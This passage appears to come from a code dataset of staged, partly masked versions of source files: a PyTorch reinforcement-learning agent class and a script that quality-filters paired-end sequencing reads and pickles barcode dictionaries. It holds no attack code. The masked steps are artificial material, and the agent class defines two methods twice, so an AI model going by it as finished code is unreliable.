self.reward_history = []\n self.episode_time_history = []\n self.best_reward_mean = -maxsize\n self.episode = 0\n self.feature_len = feature_len\n self.features = None\n self.reset()\n self.memory_resotre = memory_resotre\n reinforce_summary_path = (self.reinforce_config.summaries_path +\n '/' + self.name)\n if not self.network_config.restore_network:\n clear_summary_path(reinforce_summary_path)\n else:\n self.restore_state()\n self.summary = SummaryWriter(log_dir=reinforce_summary_path)\n self.eval_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, 
network_config)\n self.target_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, network_config)\n self.beta_schedule = LinearSchedule(self.reinforce_config.\n beta_timesteps, initial_p=self.reinforce_config.beta_initial,\n final_p=self.reinforce_config.beta_final)\n self.epsilon_schedule = LinearSchedule(self.reinforce_config.\n epsilon_timesteps, initial_p=self.reinforce_config.\n starting_epsilon, final_p=self.reinforce_config.final_epsilon)\n\n def should_explore(self):\n self.epsilon = self.epsilon_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Epsilon' % self.name, scalar_value=\n self.epsilon, global_step=self.steps)\n return random.random() < self.epsilon\n\n def predict(self, state, isGreedy=False, is_random=False):\n if self.learning:\n self.steps += 1\n if (self.previous_state is not None and self.learning and self.\n current_reward is not None):\n state_crr = np.unique(state, axis=0)\n self.memory.add(self.previous_state, None, self.current_reward,\n state_crr.reshape(-1, self.state_length), 0, self.features)\n if self.learning and self.should_explore() and not isGreedy:\n q_values = None\n fv = None\n choice = random.choice(list(range(len(state))))\n action = choice\n else:\n with torch.no_grad():\n features_vector, q_values = self.eval_model.predict_batch(\n Tensor(state))\n q_values = FloatTensor(q_values).view(-1)\n _, choice = q_values.max(0)\n action = choice\n fv = features_vector[choice]\n if (self.learning and self.steps % self.reinforce_config.\n replace_frequency == 0):\n logger.debug('Replacing target model for %s' % self.name)\n if self.reinforce_config.replace_frequency != 1:\n self.target_model.replace(self.eval_model)\n else:\n self.target_model.replace_soft(self.eval_model)\n if (self.learning and self.steps > self.reinforce_config.\n update_start and self.steps % self.reinforce_config.\n update_steps == 0):\n self.update_time -= time.time()\n self.update()\n self.update_time 
+= time.time()\n self.current_reward = 0\n self.previous_state = state[action]\n return choice, fv\n\n def disable_learning(self, is_save=False):\n logger.info('Disabled Learning for %s agent' % self.name)\n if is_save:\n self.save(force=True)\n self.learning = False\n self.episode = 0\n\n def enable_learning(self):\n logger.info('enabled Learning for %s agent' % self.name)\n self.learning = True\n self.reset()\n\n def end_episode(self, state):\n if not self.learning:\n return\n episode_time = time.time() - self.episode_time\n self.reward_history.append(self.total_reward)\n self.episode_time_history.append(episode_time)\n total_time = sum(self.episode_time_history)\n avg_time = total_time / len(self.episode_time_history)\n logger.info('End of Episode %d, Total reward %.2f, Epsilon %.2f' %\n (self.episode + 1, self.total_reward, self.epsilon))\n logger.debug(\n 'Episode Time: %.2fs (%.2fs), Prediction Time: %.2f, Update Time %.2f'\n % (episode_time, avg_time, self.prediction_time, self.update_time)\n )\n self.episode += 1\n self.summary.add_scalar(tag='%s/Episode Reward' % self.name,\n scalar_value=self.total_reward, global_step=self.episode)\n self.memory.add(self.previous_state, None, self.current_reward,\n state.reshape(-1, self.state_length), 1, self.features)\n self.save()\n self.reset()\n\n def reset(self):\n self.episode_time = time.time()\n self.current_reward = 0\n self.total_reward = 0\n self.previous_state = None\n self.previous_action = None\n self.prediction_time = 0\n self.update_time = 0\n self.features = None\n\n def restore_state(self):\n restore_path = self.network_config.network_path + '/adaptive.info'\n if self.network_config.network_path and os.path.exists(restore_path\n ) and self.memory_resotre:\n logger.info('Restoring state from %s' % self.network_config.\n network_path)\n with open(restore_path, 'rb') as file:\n info = pickle.load(file)\n self.steps = info['steps']\n self.episode = info['episode']\n 
self.memory.load(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n\n def save(self, force=False, appendix=''):\n info = {'steps': self.steps, 'best_reward_mean': self.\n best_reward_mean, 'episode': self.episode}\n if (len(self.reward_history) >= self.network_config.save_steps and \n self.episode % self.network_config.save_steps == 0 or force):\n total_reward = sum(self.reward_history[-self.network_config.\n save_steps:])\n current_reward_mean = total_reward / self.network_config.save_steps\n if force:\n print('*************saved*****************',\n current_reward_mean, self.best_reward_mean)\n if not force:\n self.best_reward_mean = current_reward_mean\n logger.info('Saving network. Found new best reward (%.2f)' %\n total_reward)\n self.eval_model.save_network(appendix=appendix)\n self.target_model.save_network(appendix=appendix)\n with open(self.network_config.network_path +\n '/adaptive.info', 'wb') as file:\n pickle.dump(info, file, protocol=pickle.HIGHEST_PROTOCOL)\n self.memory.save(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n else:\n logger.info('The best reward is still %.2f. 
Not saving' %\n self.best_reward_mean)\n\n def reward(self, r):\n self.total_reward += r\n self.current_reward += r\n\n def passFeatures(self, features):\n self.features = features.copy()\n return\n\n def summary_test(self, reward, epoch):\n self.summary.add_scalar(tag='%s/eval reward' % self.name,\n scalar_value=reward, global_step=epoch * 40)\n\n def summary_GVFs_loss(self, loss, epoch):\n self.summary.add_scalar(tag='%s/GVFs loss' % self.name,\n scalar_value=loss, global_step=epoch * 40)\n\n def update(self):\n if len(self.memory._storage) <= self.reinforce_config.batch_size:\n return\n beta = self.beta_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Beta' % self.name, scalar_value=\n beta, global_step=self.steps)\n if self.reinforce_config.use_prior_memory:\n batch = self.memory.sample(self.reinforce_config.batch_size, beta)\n (states, actions, reward, next_states, is_terminal, weights,\n batch_idxes) = batch\n self.summary.add_histogram(tag='%s/Batch Indices' % self.name,\n values=Tensor(batch_idxes), global_step=self.steps)\n else:\n batch = self.memory.sample(self.reinforce_config.batch_size)\n (states, actions, reward, next_states, is_terminal, features_vector\n ) = batch\n states = FloatTensor(states)\n terminal = FloatTensor([(1 if t else 0) for t in is_terminal])\n reward = FloatTensor(reward)\n features_vector = FloatTensor(features_vector)\n batch_index = torch.arange(self.reinforce_config.batch_size, dtype=\n torch.long)\n feature_values, q_values = self.eval_model.predict_batch(states)\n q_values = q_values.flatten()\n q_max = []\n f_max = []\n for i, ns in enumerate(next_states):\n feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns\n ).view(-1, self.state_length))\n q_value_max, idx = q_n.max(0)\n features_max = feature_n[idx]\n q_max.append(q_value_max)\n if self.network_config.version in ['v10', 'v11']:\n features_max[:, :3] = features_max[:, :3] * ns[idx, 65\n ] / states[i, 65]\n features_max[:, 3:6] = features_max[:, 
3:6] * ns[idx, 66\n ] / states[i, 66]\n features_max[:, 6:9] = features_max[:, 6:9] * ns[idx, 63\n ] / states[i, 63]\n features_max[:, 9:12] = features_max[:, 9:12] * ns[idx, 64\n ] / states[i, 64]\n features_max[features_max == float('inf')] = 0\n f_max.append(features_max.view(-1))\n q_max = torch.stack(q_max, dim=1).view(-1)\n f_max = torch.stack(f_max)\n q_max = (1 - terminal) * q_max\n f_max = (1 - terminal.view(-1, 1)) * f_max\n q_target = reward + self.reinforce_config.discount_factor * q_max\n f_target = (features_vector + self.reinforce_config.discount_factor *\n f_max)\n if (torch.sum(feature_values != feature_values).item() + torch.sum(\n f_target != f_target)).item() > 0:\n f_target[f_target != f_target] = 0\n self.eval_model.fit(q_values, q_target, feature_values, f_target)\n if self.reinforce_config.use_prior_memory:\n td_errors = q_values - q_target\n new_priorities = torch.abs(td_errors) + 1e-06\n self.memory.update_priorities(batch_idxes, new_priorities.data)\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, weight_dict):\n self.eval_model.load_weight(weight_dict)\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, new_feature_weights, new_q_weights):\n self.eval_model.feautre_model.load_state_dict(new_feature_weights)\n self.eval_model.q_model.load_state_dict(new_q_weights)\n",
"step-5": "import logging\nimport time\nimport random\nimport pickle\nimport os\nfrom sys import maxsize\n\nimport torch\nfrom tensorboardX import SummaryWriter\nfrom baselines.common.schedules import LinearSchedule\n\nfrom abp.utils import clear_summary_path\nfrom abp.models.feature_q_model import feature_q_model\nfrom abp.adaptives.common.prioritized_memory.memory_gqf import ReplayBuffer_decom\nimport numpy as np\n\nlogger = logging.getLogger('root')\nuse_cuda = torch.cuda.is_available()\nFloatTensor = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor\nLongTensor = torch.cuda.LongTensor if use_cuda else torch.LongTensor\nIntTensor = torch.cuda.IntTensor if use_cuda else torch.IntTensor\nByteTensor = torch.cuda.ByteTensor if use_cuda else torch.ByteTensor\nTensor = FloatTensor\n\n\nclass SADQ_GQF(object):\n \"\"\"Adaptive which uses the SADQ algorithm\"\"\"\n\n def __init__(self, name, state_length, network_config, reinforce_config, feature_len, combine_decomposed_func, is_sigmoid = False, memory_resotre = True):\n super(SADQ_GQF, self).__init__()\n self.name = name\n #self.choices = choices\n self.network_config = network_config\n self.reinforce_config = reinforce_config\n\n self.memory = ReplayBuffer_decom(self.reinforce_config.memory_size)\n\n self.learning = True\n self.explanation = False\n self.state_length = state_length\n\n self.features = 0\n self.feature_len = feature_len\n # Global\n self.steps = 0\n self.reward_history = []\n self.episode_time_history = []\n self.best_reward_mean = -maxsize\n self.episode = 0\n self.feature_len = feature_len\n self.features = None\n\n self.reset()\n self.memory_resotre = memory_resotre\n reinforce_summary_path = self.reinforce_config.summaries_path + \"/\" + self.name\n\n if not self.network_config.restore_network:\n clear_summary_path(reinforce_summary_path)\n else:\n self.restore_state()\n \n self.summary = SummaryWriter(log_dir=reinforce_summary_path)\n self.eval_model = feature_q_model(name, state_length, 
self.feature_len, self.network_config.output_shape, network_config)\n self.target_model = feature_q_model(name, state_length, self.feature_len, self.network_config.output_shape, network_config)\n# self.target_model.eval_mode()\n\n self.beta_schedule = LinearSchedule(self.reinforce_config.beta_timesteps,\n initial_p=self.reinforce_config.beta_initial,\n final_p=self.reinforce_config.beta_final)\n\n self.epsilon_schedule = LinearSchedule(self.reinforce_config.epsilon_timesteps,\n initial_p=self.reinforce_config.starting_epsilon,\n final_p=self.reinforce_config.final_epsilon)\n\n# def __del__(self):\n# self.save()\n# self.summary.close()\n\n def should_explore(self):\n self.epsilon = self.epsilon_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Epsilon' % self.name,\n scalar_value=self.epsilon,\n global_step=self.steps)\n\n return random.random() < self.epsilon\n\n def predict(self, state, isGreedy = False, is_random = False):\n \n if self.learning:\n self.steps += 1\n # add to experience\n if self.previous_state is not None and self.learning and self.current_reward is not None:\n state_crr = np.unique(state, axis=0)\n self.memory.add(self.previous_state,\n None,\n self.current_reward,\n state_crr.reshape(-1, self.state_length), 0,\n self.features)\n# print(\"not final : {}\".format(self.current_reward) )\n# print(0, self.features)\n if self.learning and self.should_explore() and not isGreedy:\n q_values = None\n fv = None\n choice = random.choice(list(range(len(state))))\n action = choice\n else:\n with torch.no_grad():\n features_vector, q_values = self.eval_model.predict_batch(Tensor(state))\n q_values = FloatTensor(q_values).view(-1)\n\n _, choice = q_values.max(0)\n action = choice\n fv = features_vector[choice]\n# print(\"q_value : {}\".format(q_values))\n# input()\n if self.learning and self.steps % self.reinforce_config.replace_frequency == 0:\n logger.debug(\"Replacing target model for %s\" % self.name)\n if self.reinforce_config.replace_frequency 
!= 1:\n self.target_model.replace(self.eval_model)\n else:\n self.target_model.replace_soft(self.eval_model)\n# self.target_model.eval_mode()\n\n if (self.learning and\n self.steps > self.reinforce_config.update_start and\n self.steps % self.reinforce_config.update_steps == 0):\n self.update_time -= time.time()\n self.update()\n self.update_time += time.time()\n\n self.current_reward = 0\n self.previous_state = state[action]\n #self.previous_action = action\n\n return choice, fv#,q_values\n\n def disable_learning(self, is_save = False):\n logger.info(\"Disabled Learning for %s agent\" % self.name)\n if is_save:\n# self.save()\n self.save(force = True)\n self.learning = False\n self.episode = 0\n \n def enable_learning(self):\n logger.info(\"enabled Learning for %s agent\" % self.name)\n self.learning = True\n self.reset()\n\n def end_episode(self, state):\n if not self.learning:\n return\n# print(\"end:\")\n# print(self.current_reward)\n# input()\n episode_time = time.time() - self.episode_time\n\n self.reward_history.append(self.total_reward)\n self.episode_time_history.append(episode_time)\n total_time = sum(self.episode_time_history)\n avg_time = total_time / len(self.episode_time_history)\n\n logger.info(\"End of Episode %d, \"\n \"Total reward %.2f, \"\n \"Epsilon %.2f\" % (self.episode + 1,\n self.total_reward,\n self.epsilon))\n\n logger.debug(\"Episode Time: %.2fs (%.2fs), \"\n \"Prediction Time: %.2f, \"\n \"Update Time %.2f\" % (episode_time,\n avg_time,\n self.prediction_time,\n self.update_time))\n\n self.episode += 1\n self.summary.add_scalar(tag='%s/Episode Reward' % self.name,\n scalar_value=self.total_reward,\n global_step=self.episode)\n\n self.memory.add(self.previous_state,\n None,\n self.current_reward,\n state.reshape(-1, self.state_length), 1,\n self.features)\n# print(\"final : {}\".format(self.current_reward) )\n# input()\n# print(1, self.features)\n self.save()\n self.reset()\n\n def reset(self):\n self.episode_time = time.time()\n 
self.current_reward = 0\n self.total_reward = 0\n self.previous_state = None\n self.previous_action = None\n self.prediction_time = 0\n self.update_time = 0\n self.features = None\n\n def restore_state(self):\n restore_path = self.network_config.network_path + \"/adaptive.info\"\n if self.network_config.network_path and os.path.exists(restore_path) and self.memory_resotre:\n logger.info(\"Restoring state from %s\" % self.network_config.network_path)\n\n with open(restore_path, \"rb\") as file:\n info = pickle.load(file)\n\n self.steps = info[\"steps\"]\n# self.best_reward_mean = info[\"best_reward_mean\"]\n self.episode = info[\"episode\"]\n self.memory.load(self.network_config.network_path)\n print(\"lenght of memeory: \", len(self.memory))\n\n def save(self, force=False, appendix=\"\"):\n info = {\n \"steps\": self.steps,\n \"best_reward_mean\": self.best_reward_mean,\n \"episode\": self.episode\n }\n \n if (len(self.reward_history) >= self.network_config.save_steps and\n self.episode % self.network_config.save_steps == 0) or force:\n\n total_reward = sum(self.reward_history[-self.network_config.save_steps:])\n current_reward_mean = total_reward / self.network_config.save_steps\n\n if force: #or current_reward_mean >= self.best_reward_mean:\n print(\"*************saved*****************\", current_reward_mean, self.best_reward_mean)\n if not force:\n self.best_reward_mean = current_reward_mean\n logger.info(\"Saving network. Found new best reward (%.2f)\" % total_reward)\n self.eval_model.save_network(appendix = appendix)\n self.target_model.save_network(appendix = appendix)\n# self.eval_model.save_network()\n# self.target_model.save_network()\n with open(self.network_config.network_path + \"/adaptive.info\", \"wb\") as file:\n pickle.dump(info, file, protocol=pickle.HIGHEST_PROTOCOL)\n self.memory.save(self.network_config.network_path)\n print(\"lenght of memeory: \", len(self.memory))\n else:\n logger.info(\"The best reward is still %.2f. 
Not saving\" % self.best_reward_mean)\n\n def reward(self, r):\n self.total_reward += r\n self.current_reward += r\n\n def passFeatures(self, features):\n self.features = features.copy()\n return\n\n def summary_test(self, reward, epoch):\n self.summary.add_scalar(tag='%s/eval reward' % self.name,\n scalar_value=reward, global_step=epoch * 40)\n def summary_GVFs_loss(self, loss, epoch):\n self.summary.add_scalar(tag='%s/GVFs loss' % self.name,\n scalar_value=loss, global_step=epoch * 40)\n \n def update(self):\n if len(self.memory._storage) <= self.reinforce_config.batch_size:\n return\n# self.eval_model.train_mode()\n beta = self.beta_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Beta' % self.name,\n scalar_value=beta, global_step=self.steps)\n if self.reinforce_config.use_prior_memory:\n batch = self.memory.sample(self.reinforce_config.batch_size, beta)\n (states, actions, reward, next_states,\n is_terminal, weights, batch_idxes) = batch\n self.summary.add_histogram(tag='%s/Batch Indices' % self.name,\n values=Tensor(batch_idxes),\n global_step=self.steps)\n else:\n batch = self.memory.sample(self.reinforce_config.batch_size)\n (states, actions, reward, next_states, is_terminal, features_vector) = batch\n\n states = FloatTensor(states)\n# print(states.size())\n# next_states = FloatTensor(next_states)\n terminal = FloatTensor([1 if t else 0 for t in is_terminal])\n reward = FloatTensor(reward)\n features_vector = FloatTensor(features_vector)\n batch_index = torch.arange(self.reinforce_config.batch_size,\n dtype=torch.long)\n # Current Q Values\n feature_values, q_values = self.eval_model.predict_batch(states)\n q_values = q_values.flatten()\n q_max = []\n f_max = []\n for i, ns in enumerate(next_states):\n feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns).view(-1, self.state_length))\n q_value_max, idx = q_n.max(0)\n features_max = feature_n[idx]\n \n q_max.append(q_value_max)\n if self.network_config.version in [\"v10\", \"v11\"]:\n# 
print(features_max)\n# print(ns[idx, 63:67])\n# print(states[i, 63:67])\n# print(features_max.size(), FloatTensor(ns).view(-1, self.state_length).size(), states.size())\n features_max[:, :3] = (features_max[:, :3] * ns[idx, 65]) / states[i, 65]\n features_max[:, 3:6] = (features_max[:, 3:6] * ns[idx, 66]) / states[i, 66]\n features_max[:, 6:9] = (features_max[:, 6:9] * ns[idx, 63]) / states[i, 63]\n features_max[:, 9:12] = (features_max[:, 9:12] * ns[idx, 64]) / states[i, 64]\n features_max[features_max == float('inf')] = 0\n# print(features_max)\n# input()\n f_max.append(features_max.view(-1))\n \n# if torch.sum(terminal == torch.sum(features_vector, dim = 1)) != len(terminal):\n# print(terminal)\n# print(features_vector)\n# input()\n q_max = torch.stack(q_max, dim = 1).view(-1)\n f_max = torch.stack(f_max)\n q_max = (1 - terminal) * q_max\n \n f_max = (1 - terminal.view(-1, 1)) * f_max\n \n q_target = reward + self.reinforce_config.discount_factor * q_max\n \n f_target = features_vector + self.reinforce_config.discount_factor * f_max\n \n# if torch.sum(reward).item() > 0:\n# print(reward)\n# print(feature_values)\n# print(q_target)\n# print(q_values)\n# input()\n # update model\n if (torch.sum(feature_values != feature_values).item() + torch.sum(f_target != f_target)).item() > 0:\n\n# print(\"1\")\n# print(features_vector)\n# print(\"2\")\n# print(feature_values)\n# print(\"3\")\n# print(f_target)\n# print(\"4\")\n# print(f_max)\n# print(\"5\")\n# print(states.tolist())\n# input()\n f_target[f_target != f_target] = 0\n self.eval_model.fit(q_values, q_target, feature_values, f_target)\n\n # Update priorities\n if self.reinforce_config.use_prior_memory:\n td_errors = q_values - q_target\n new_priorities = torch.abs(td_errors) + 1e-6 # prioritized_replay_eps\n self.memory.update_priorities(batch_idxes, new_priorities.data)\n \n def load_model(self, model):\n self.eval_model.replace(model)\n \n def load_weight(self, weight_dict):\n 
self.eval_model.load_weight(weight_dict)\n \n def load_model(self, model):\n self.eval_model.replace(model)\n \n def load_weight(self, new_feature_weights, new_q_weights):\n self.eval_model.feautre_model.load_state_dict(new_feature_weights)\n self.eval_model.q_model.load_state_dict(new_q_weights)",
"step-ids": [
11,
16,
19,
22,
23
]
}
|
[
11,
16,
19,
22,
23
] |
"""
Process paired-end reads of the barcode-guide-donor Step 1 cassette to generate a library reference table mapping barcodes to features.
Create dictionaries mapping barcodes to forward and reverse reads, split into sub-segments.
R1_dict: map barcodes to corresponding R1 sequences.
R2_dict: map barcodes to corresponding R2 sequences.
read_count_dict: map each barcode to corresponding total number of reads.
"""
from collections import Counter
import argparse
import gzip
import numpy as np
import pickle
# Command-line interface: paired sequencing inputs, job segmentation, output
# keyword, and quality/read-count cutoffs used to filter reads downstream.
parser = argparse.ArgumentParser()
_argument_specs = [
    (('-f', '-forward'), dict(required=True, help="forward sequencing files", nargs='+', action='store', dest='forward_files')),
    (('-r', '-reverse'), dict(required=True, help="reverse sequencing files", nargs='+', action='store', dest='reverse_files')),
    (('-s', '-segments'), dict(required=True, help="number of segments to split job into", action='store', dest='total_segments')),
    (('-o', '-out'), dict(required=True, help="keyword for saving output files", action='store', dest='out')),
    (('-c', '-cutoff'), dict(required=False, default=0, help="read count cutoff for barcodes to keep (default=0)", action='store', dest='cutoff')),
    (('-b', '-barcode'), dict(required=False, default=31, help="length of barcode (default=31)", action='store', dest='barcode_length')),
    (('-bq', '-bquality'), dict(required=False, default=53, help="ascii quality score cutoff for barcode (default=53)", action='store', dest='barcode_quality')),
    (('-gdq', '-gdquality'), dict(required=False, default=55, help="ascii quality score cutoff for guide-donor (default=55)", action='store', dest='guide_donor_quality')),
]
for _flags, _options in _argument_specs:
    parser.add_argument(*_flags, **_options)
args = parser.parse_args()
# Normalize parsed options into typed module-level constants.
OUTPUT_HEADER = args.out
READ_COUNT_CUTOFF = int(args.cutoff)
BARCODE_LENGTH = int(args.barcode_length)
BARCODE_QUALITY_CUTOFF = int(args.barcode_quality)
GUIDE_DONOR_QUALITY_CUTOFF = int(args.guide_donor_quality)
# Collect all sequencing reads from forward (R1) gzip'd FASTQ files.
forward_lines = []
for file in args.forward_files:
    # Context manager closes each gzip handle instead of leaking it.
    with gzip.open(file) as handle:
        forward_lines.extend(handle.readlines())
# Forward sequence: line 2 of every 4-line FASTQ record.
forward_sequence = [forward_lines[r] for r in range(1, len(forward_lines), 4)]
forward_sequence = [l.decode('utf-8').replace("\n", "") for l in forward_sequence]
# Forward per-base quality strings: line 4 of every 4-line FASTQ record.
forward_quality = [forward_lines[r] for r in range(3, len(forward_lines), 4)]
forward_quality = [l.decode('utf-8').replace("\n", "") for l in forward_quality]
# Barcode quality: mean ASCII code over the barcode prefix of each read.
barcode_quality_scores = [np.mean([ord(i) for i in line[:BARCODE_LENGTH]])
                          for line in forward_quality]
# Guide-donor quality: mean ASCII code over the remainder of each read.
forward_guide_donor_quality_scores = [np.mean([ord(i) for i in line[BARCODE_LENGTH:]])
                                      for line in forward_quality]
# Collect all sequencing reads from reverse (R2) gzip'd FASTQ files.
reverse_lines = []
for file in args.reverse_files:
    # Context manager closes each gzip handle instead of leaking it.
    with gzip.open(file) as handle:
        reverse_lines.extend(handle.readlines())
# Reverse sequence: line 2 of every 4-line FASTQ record.
reverse_sequence = [reverse_lines[r] for r in range(1, len(reverse_lines), 4)]
reverse_sequence = [l.decode('utf-8').replace("\n", "") for l in reverse_sequence]
# Reverse per-base quality strings: line 4 of every 4-line FASTQ record.
reverse_quality = [reverse_lines[r] for r in range(3, len(reverse_lines), 4)]
reverse_quality = [l.decode('utf-8').replace("\n", "") for l in reverse_quality]
# Reverse read quality: mean ASCII code over the whole read.
reverse_guide_donor_quality_scores = [np.mean([ord(i) for i in line])
                                      for line in reverse_quality]
# Filter out low quality barcodes and low quality guide-donor sequences.
# A read pair is kept only when the barcode prefix, the forward guide-donor
# portion, and the whole reverse read all meet their mean-quality cutoffs.
forward_sequence, reverse_sequence, barcodes = zip(*[(f, r, f[:BARCODE_LENGTH]) for f, r, fscore, fscore2, rscore
                       in zip(forward_sequence, reverse_sequence, barcode_quality_scores, forward_guide_donor_quality_scores, reverse_guide_donor_quality_scores)
                       if (fscore >= BARCODE_QUALITY_CUTOFF) and (fscore2 >= GUIDE_DONOR_QUALITY_CUTOFF) and (rscore >= GUIDE_DONOR_QUALITY_CUTOFF)])
if (READ_COUNT_CUTOFF != 0):  # optional choice to remove low read barcodes from annotations.
    # Dict used as a set for O(1) membership tests during the filter below.
    keep_dict = {key: True for key, count in Counter(barcodes).items() if count >= READ_COUNT_CUTOFF}
    forward_sequence, reverse_sequence, barcodes = zip(*[(f, r, b) for f, r, b
                           in zip(forward_sequence, reverse_sequence, barcodes) if b in keep_dict])
# Store barcode read count dictionary for later use.
# "with" guarantees the file is closed even if pickling fails;
# protocol=2 keeps the pickle readable by Python 2 consumers.
count_dict = dict(Counter(barcodes))
with open(OUTPUT_HEADER + ".read_count_dict", "wb") as pickle_out:
    pickle.dump(count_dict, pickle_out, protocol=2)
# Divide up barcodes into specified number of segments for parallel analysis.
barcode_list = list(set(barcodes))  # unique barcodes; set built once, not twice
LENGTH = len(barcode_list)
total_segments = int(args.total_segments)
for segment in range(0, total_segments):
    # Half-open [start, stop) slice of unique barcodes for this segment;
    # the final segment absorbs any remainder from the integer division.
    start = int((LENGTH/total_segments)*segment)
    if (segment+1 == total_segments):
        sub_barcodes_set = barcode_list[start:]
    else:
        stop = int((LENGTH/total_segments)*(segment+1))
        sub_barcodes_set = barcode_list[start:stop]
    sub_barcodes_dict = {b: True for b in sub_barcodes_set}  # dict-as-set for O(1) lookup
    sub_forward, sub_reverse, sub_barcodes = zip(*[(f, r, b) for f, r, b
                           in zip(forward_sequence, reverse_sequence, barcodes) if b in sub_barcodes_dict])
    # Store reads by barcode into R1 and R2 dictionaries.
    R1_dict, R2_dict = {}, {}
    for f, r, b in zip(sub_forward, sub_reverse, sub_barcodes):
        R1_dict.setdefault(b, []).append(f)
        R2_dict.setdefault(b, []).append(r)
    # Persist per-segment dictionaries; "with" guarantees each file is closed
    # even if pickling raises. protocol=2 keeps Python 2 compatibility.
    segment_prefix = OUTPUT_HEADER + "_" + str(segment) + "-" + str(total_segments)
    with open(segment_prefix + ".R1_dict", "wb") as pickle_out:
        pickle.dump(R1_dict, pickle_out, protocol=2)
    with open(segment_prefix + ".R2_dict", "wb") as pickle_out:
        pickle.dump(R2_dict, pickle_out, protocol=2)
|
normal
|
{
"blob_id": "9206e4c4eff8ca64266ce53705e88069912b80d8",
"index": 1526,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nparser.add_argument('-f', '-forward', required=True, help=\n 'forward sequencing files', nargs='+', action='store', dest='forward_files'\n )\nparser.add_argument('-r', '-reverse', required=True, help=\n 'reverse sequencing files', nargs='+', action='store', dest='reverse_files'\n )\nparser.add_argument('-s', '-segments', required=True, help=\n 'number of segments to split job into', action='store', dest=\n 'total_segments')\nparser.add_argument('-o', '-out', required=True, help=\n 'keyword for saving output files', action='store', dest='out')\nparser.add_argument('-c', '-cutoff', required=False, default=0, help=\n 'read count cutoff for barcodes to keep (default=0)', action='store',\n dest='cutoff')\nparser.add_argument('-b', '-barcode', required=False, default=31, help=\n 'length of barcode (default=31)', action='store', dest='barcode_length')\nparser.add_argument('-bq', '-bquality', required=False, default=53, help=\n 'ascii quality score cutoff for barcode (default=53)', action='store',\n dest='barcode_quality')\nparser.add_argument('-gdq', '-gdquality', required=False, default=55, help=\n 'ascii quality score cutoff for guide-donor (default=55)', action=\n 'store', dest='guide_donor_quality')\n<mask token>\nfor file in args.forward_files:\n forward_lines.extend(gzip.open(file).readlines())\n<mask token>\nfor line in forward_quality:\n scores = [ord(i) for i in line[:BARCODE_LENGTH]]\n barcode_quality_scores.append(np.mean(scores))\n<mask token>\nfor line in forward_quality:\n scores = [ord(i) for i in line[BARCODE_LENGTH:]]\n forward_guide_donor_quality_scores.append(np.mean(scores))\n<mask token>\nfor file in args.reverse_files:\n reverse_lines.extend(gzip.open(file).readlines())\n<mask token>\nfor line in reverse_quality:\n scores = [ord(i) for i in line]\n reverse_guide_donor_quality_scores.append(np.mean(scores))\n<mask token>\nif READ_COUNT_CUTOFF != 0:\n barcodes_to_keep = [key for key, count in Counter(barcodes).items() if \n 
count >= READ_COUNT_CUTOFF]\n keep_dict = {g: (True) for g in barcodes_to_keep}\n forward_sequence, reverse_sequence, barcodes = zip(*[(f, r, b) for f, r,\n b in zip(forward_sequence, reverse_sequence, barcodes) if b in\n keep_dict])\n<mask token>\npickle.dump(count_dict, pickle_out, protocol=2)\npickle_out.close()\n<mask token>\nfor segment in range(0, total_segments):\n start = int(LENGTH / total_segments * segment)\n if segment + 1 == total_segments:\n sub_barcodes_set = barcode_list[start:]\n else:\n stop = int(LENGTH / total_segments * (segment + 1))\n sub_barcodes_set = barcode_list[start:stop]\n sub_barcodes_dict = {b: (True) for b in sub_barcodes_set}\n sub_forward, sub_reverse, sub_barcodes = zip(*[(f, r, b) for f, r, b in\n zip(forward_sequence, reverse_sequence, barcodes) if b in\n sub_barcodes_dict])\n R1_dict, R2_dict = {}, {}\n for f, r, b in zip(sub_forward, sub_reverse, sub_barcodes):\n if b not in R1_dict and b not in R2_dict:\n R1_dict[b] = [f]\n R2_dict[b] = [r]\n else:\n R1_dict[b].append(f)\n R2_dict[b].append(r)\n pickle_out = open(OUTPUT_HEADER + '_' + str(segment) + '-' + str(\n total_segments) + '.R1_dict', 'wb')\n pickle.dump(R1_dict, pickle_out, protocol=2)\n pickle_out.close()\n pickle_out = open(OUTPUT_HEADER + '_' + str(segment) + '-' + str(\n total_segments) + '.R2_dict', 'wb')\n pickle.dump(R2_dict, pickle_out, protocol=2)\n pickle_out.close()\n",
"step-3": "<mask token>\nparser = argparse.ArgumentParser()\nparser.add_argument('-f', '-forward', required=True, help=\n 'forward sequencing files', nargs='+', action='store', dest='forward_files'\n )\nparser.add_argument('-r', '-reverse', required=True, help=\n 'reverse sequencing files', nargs='+', action='store', dest='reverse_files'\n )\nparser.add_argument('-s', '-segments', required=True, help=\n 'number of segments to split job into', action='store', dest=\n 'total_segments')\nparser.add_argument('-o', '-out', required=True, help=\n 'keyword for saving output files', action='store', dest='out')\nparser.add_argument('-c', '-cutoff', required=False, default=0, help=\n 'read count cutoff for barcodes to keep (default=0)', action='store',\n dest='cutoff')\nparser.add_argument('-b', '-barcode', required=False, default=31, help=\n 'length of barcode (default=31)', action='store', dest='barcode_length')\nparser.add_argument('-bq', '-bquality', required=False, default=53, help=\n 'ascii quality score cutoff for barcode (default=53)', action='store',\n dest='barcode_quality')\nparser.add_argument('-gdq', '-gdquality', required=False, default=55, help=\n 'ascii quality score cutoff for guide-donor (default=55)', action=\n 'store', dest='guide_donor_quality')\nargs = parser.parse_args()\nOUTPUT_HEADER = args.out\nREAD_COUNT_CUTOFF = int(args.cutoff)\nBARCODE_LENGTH = int(args.barcode_length)\nBARCODE_QUALITY_CUTOFF = int(args.barcode_quality)\nGUIDE_DONOR_QUALITY_CUTOFF = int(args.guide_donor_quality)\nforward_lines = []\nfor file in args.forward_files:\n forward_lines.extend(gzip.open(file).readlines())\nforward_sequence = [forward_lines[r] for r in range(1, len(forward_lines), 4)]\nforward_sequence = [l.decode('utf-8').replace('\\n', '') for l in\n forward_sequence]\nforward_quality = [forward_lines[r] for r in range(3, 